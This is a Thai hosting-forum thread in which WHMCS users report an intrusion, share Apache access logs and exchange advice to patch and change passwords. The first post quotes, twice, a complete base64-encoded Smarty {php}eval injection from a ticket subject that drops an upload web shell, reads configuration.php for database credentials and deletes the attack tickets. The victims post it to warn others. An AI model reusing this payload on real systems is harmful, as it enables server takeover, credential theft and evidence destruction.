Whmcs ผมโดนดีเข้าแล้วหรอครับ

11163 · January 22, 2012, 8:17pm

จากภาพ ครับ ผมได้ Ticket ข้อความแบบด้านล่าง บ่อยมากครับ



A new support ticket has been opened.



 Client: rea

Department: แจ้งปัญหา - Support

Subject:  {php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0nKTsNCg0KJGYwcDNuID0gZm9wZW4gKCd0ZW1wbGF0ZXNfYy9pbmRleHgucGhwJywnYScpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw0KDQppZiAoJHdyaXQpIHsNCiAgICBlY2hvICc8Y2VudGVyPjxiPjxmb250IGNvbG9yPXJlZCA+RG9uZSAuLi4gR28gPT4gZG93bmxvYWRzL2luZGV4eC5waHAgOyknOw0KICAgIGZjbG9zZSgkd3JpdCk7DQp9IGVsc2Ugew0KICAgIGVjaG8gJ0Vycm9yICEhJzsNCn0NCiR0ZXh0PWZpbGVfZ2V0X2NvbnRlbnRzKCJjb25maWd1cmF0aW9uLnBocCIpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KZXZhbCgkdGV4dCk7DQokZGI9bXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdXNlcm5hbWUsJGRiX3Bhc3N3b3JkKSBvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvciBkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTs='));{/php}

Priority: Medium



 ---

{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0nKTsNCg0KJGYwcDNuID0gZm9wZW4gKCd0ZW1wbGF0ZXNfYy9pbmRleHgucGhwJywnYScpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw0KDQppZiAoJHdyaXQpIHsNCiAgICBlY2hvICc8Y2VudGVyPjxiPjxmb250IGNvbG9yPXJlZCA+RG9uZSAuLi4gR28gPT4gZG93bmxvYWRzL2luZGV4eC5waHAgOyknOw0KICAgIGZjbG9zZSgkd3JpdCk7DQp9IGVsc2Ugew0KICAgIGVjaG8gJ0Vycm9yICEhJzsNCn0NCiR0ZXh0PWZpbGVfZ2V0X2NvbnRlbnRzKCJjb25maWd1cmF0aW9uLnBocCIpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KZXZhbCgkdGV4dCk7DQokZGI9bXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdXNlcm5hbWUsJGRiX3Bhc3N3b3JkKSBvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvciBkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTs='));{/php}



----------------------------

IP Address: 78.177.228.160

---



 You can respond to this ticket by simply replying to this email or through the admin area at the url below.

SiamLiveHost.com · January 22, 2012, 8:24pm

ถ้าอัพเดตล่าสุด หรือ Patch แล้วก็ไม่น่าห่วงอะไรครับ…แต่ถ้ายังล่ะก็

11163 · January 22, 2012, 8:53pm

ตอนนี้เอาไฟล์มาให้ดูครับ อยู่ๆ เข้าไปอยู่ที่ template_c ครับ

indexx.php

joomla.php

web.php

[url=“http://www.mediafire.com/?k9sxnslqypfuuwt”]

11163 · January 22, 2012, 9:14pm

แย่จังครับ ไล่เปลี่ยน pass ซะ มึนหัวเลย ทั้งป่วย

11163 · January 22, 2012, 10:34pm

คนแฮ็ก [b][color=#F200FF][b]h4CkeR

เก่งจังนะครับ นับถือ

[/b][/color][/b]

11163 · January 22, 2012, 10:57pm

ไม่มีคนตอบเลย แต่ผม ลองรันไฟล์ web.php แนะนำให้พี่ๆ เจ้าของโฮส รีบๆ ค้นดูนะครับ

สุดยอดมาก เอาเข้ามาได้ยังไง กัน ไม่เคยเห็นเลยครับ

EleLight · January 22, 2012, 11:02pm

โดน back door ครับ ผมก็เคยโดน อัพเดรตแล้วไล่เปลี่ยนพาสทั้งหมดเลยคัรบ ลองเข้าไปฟอรั่มดู

Freedomlover · January 22, 2012, 11:03pm

อย่าลืมอัพให้เป็นตัวล่าสุด หรือไปโหลด patch มาด้วยละครับ เดี่ยวจะโดนอีก

11163 · January 22, 2012, 11:19pm

ตอนนี้ เอา log มาให้ดูครับ เคร้าจริง แต่ละไฟล์ที่เ้ค้าเอามามัน manage ได้เลย จบเลย



78.177.228.160 - - [22/Jan/2012:18:11:17 +0700] "GET /submitticket.php?step=2&deptid=2 HTTP/1.1" 200 3187 "http://www.google.com.tr/url?sa=t&rct=j&q=inurl%3Asubmitticket.php%20%E0%B9%81%E0%B8%81&source=web&cd=55&ved=0CD0QFjAEODI&url=http%3A%2F%2Fclient.tzi.net%2Fsubmitticket.php%3Fstep%3D2%26deptid%3D2&ei=9esbT6fCKc6DtQbQg6xH&usg=AFQjCNHH_7n3_jwHc__6M_aHIcmymUKZ0A&cad=rja" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:18 +0700] "GET /templates/portal/style.css HTTP/1.1" 200 1810 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /templates/portal/images/icons/support.gif HTTP/1.1" 200 1339 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /images/add.gif HTTP/1.1" 200 864 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /includes/verifyimage.php HTTP/1.1" 200 2122 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /templates/portal/images/icons/star.png HTTP/1.1" 200 711 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/clientarea.gif HTTP/1.1" 200 1333 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/announcement.gif HTTP/1.1" 200 911 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/knowledgebase.gif HTTP/1.1" 200 1312 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/submit-ticket.gif HTTP/1.1" 200 1338 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/downloads.gif HTTP/1.1" 200 1335 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:21 +0700] "GET /templates/portal/images/icons/order.gif HTTP/1.1" 200 1329 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 200 20091 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:23 +0700] "GET /templates/portal/images/bg_background.gif HTTP/1.1" 200 714 "http://client.tzi.net/templates/portal/style.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:23 +0700] "GET /templates/portal/images/content_container_bg.gif HTTP/1.1" 200 365 "http://client.tzi.net/templates/portal/style.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:24 +0700] "GET /favicon.ico HTTP/1.1" 404 602 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:33 +0700] "POST /submitticket.php HTTP/1.1" 200 437 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:36 +0700] "POST /submitticket.php?step=3 HTTP/1.1" 302 475 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:38 +0700] "GET /submitticket.php?step=4 HTTP/1.1" 200 2262 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:12:04 +0700] "GET //templates_c/indexx.php HTTP/1.1" 200 393 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:12:14 +0700] "POST //templates_c/indexx.php HTTP/1.1" 200 350 "http://client.tzi.net//templates_c/indexx.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:13:28 +0700] "GET //templates_c/joomla.php HTTP/1.1" 200 8910 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:13:36 +0700] "POST //templates_c/joomla.php HTTP/1.1" 200 6663 "http://client.tzi.net//templates_c/joomla.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

11163 · January 22, 2012, 11:24pm



http://www.google.com.tr/url?sa=t&rct=j&q=inurl%3Asubmitticket.php%20%E0%B9%81%E0%B8%81&source=web&cd=55&ved=0CD0QFjAEODI&url=http%3A%2F%2Fclient.tzi.net%2Fsubmitticket.php%3Fstep%3D2%26deptid%3D2&ei=9esbT6fCKc6DtQbQg6xH&usg=AFQjCNHH_7n3_jwHc__6M_aHIcmymUKZ0A&cad=rja

จุดเริ่มต้น

ปล. เว็บ tzi.net แค่ยกตัวอย่างมานะครับ

11163 · January 23, 2012, 7:03pm

มันเข้าไปเปลี่ยน DNS ผมได้แล้ว งง มาก โดเมนจดไว้ที่อื่นไม่ได้รวมกับที่ไหน ไม่ได้พ่วงไว้กับ whmcs ด้วย

โดเมนหลักถูกชี้มาไอพี

173.193.106.10

ขอบคุณที่เค้าไม่ย้ายหนี

SiamLiveHost.com · January 24, 2012, 7:23am

แหม่ เช้านี้มีคนมาลองของที่เว็บผมด้วย คิดว่าคงเป็นคนใน THT นี่ล่ะ ข้อความใน Ticket เหมือนตัวอย่างในกระทู้เลย

IP True Internet บ้านใครหรอครับ แสดงตัวหน่อยสิ

DATATAN.NET · January 24, 2012, 8:19am

ผมก็โดนครับ ตอนตีห้า IP True Internet เหมือนกัน อย่ามาลองบ่อยๆนะ รำคาร

Freedomlover · January 24, 2012, 8:46am

ผมก็โดน ip เดียวกันเลยครับ 5555 ไอเราก็งง อุส่าเปิดให้เฉพาะ ip ไทยเท่านั้นที่เข้าได้ มาได้ไง ที่ไหนได้ ip จากไทยนี่เอง



58.11.162.232 - - [24/Jan/2012:04:38:02 +0700] "GET /submitticket.php HTTP/1.1" 200 2483 "http://www.google.co.th/url?sa=t&rct=j&q=inurl:submitticket.php&source=web&cd=54&ved=0CDcQFjADODI&url=http%3A%2F%2Fmydomain.com%2Fsubmitticket.php&ei=39IdT62xI8XorAfU75mSDA&usg=AFQjCNH2dYjjIptHsLobEE5WWXEx4zwU5w&sig2=L7_TGinoljZUPifqUcj6fw" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /templates/default/css/bootstrap.css HTTP/1.1" 200 13727 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /templates/default/css/whmcs.css HTTP/1.1" 200 5486 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 200 36233 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /templates/default/js/whmcs.js HTTP/1.1" 200 1950 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:06 +0700] "GET /images/emails.gif HTTP/1.1" 200 1524 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:06 +0700] "GET /templates/default/img/whmcslogo.png HTTP/1.1" 200 21353 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:09 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4059 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:58 +0700] "GET /submitticket.php?step=2&deptid=2 HTTP/1.1" 200 3230 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:58 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:58 +0700] "GET /templates/default/css/bootstrap.css HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:59 +0700] "GET /templates/default/css/whmcs.css HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:59 +0700] "GET /templates/default/js/whmcs.js HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /templates/default/img/whmcslogo.png HTTP/1.1" 304 383 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /images/add.gif HTTP/1.1" 200 1092 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /includes/verifyimage.php HTTP/1.1" 200 2430 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4260 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:30 +0700] "POST /submitticket.php HTTP/1.1" 200 734 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:34 +0700] "POST /submitticket.php?step=3 HTTP/1.1" 302 766 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:35 +0700] "GET /submitticket.php?step=4 HTTP/1.1" 200 2318 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:36 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4260 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:54 +0700] "GET /viewticket.php?tid=512837&c=u4tvdg7M HTTP/1.1" 200 4510 "https://mydomain.com/submitticket.php?step=4" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

iCafe · January 24, 2012, 8:57am

คนที่มาอ่านในนี้หล่ะ

SmileHost.Asia · January 24, 2012, 9:04am

ผมก็โดน ไอพีเดียวกัน ขนาดไม่ค่อยเล่น THT น่ะ กระทู้นี้ก็ยังไม่ได้แสดงความเห็น

IP Address: 58.11.162.232

5:16:52 AM

Freedomlover · January 25, 2012, 2:04am

ตอน 1:24 น. ที่ผ่านมา มาจาก ip 58.9.20.41 อีกแล้วครับ ^^



58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /cart.php?a=add&pid=75 HTTP/1.1" 200 2712 "http://www.mydomain.com/web-hosting/linux-hosting/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 200 36233 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/default/css/bootstrap.css HTTP/1.1" 200 13727 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/default/css/whmcs.css HTTP/1.1" 200 5486 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/default/js/whmcs.js HTTP/1.1" 200 1950 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/orderforms/cart/style.css HTTP/1.1" 200 1278 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:11 +0700] "GET /templates/default/img/whmcslogo.png HTTP/1.1" 200 21353 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

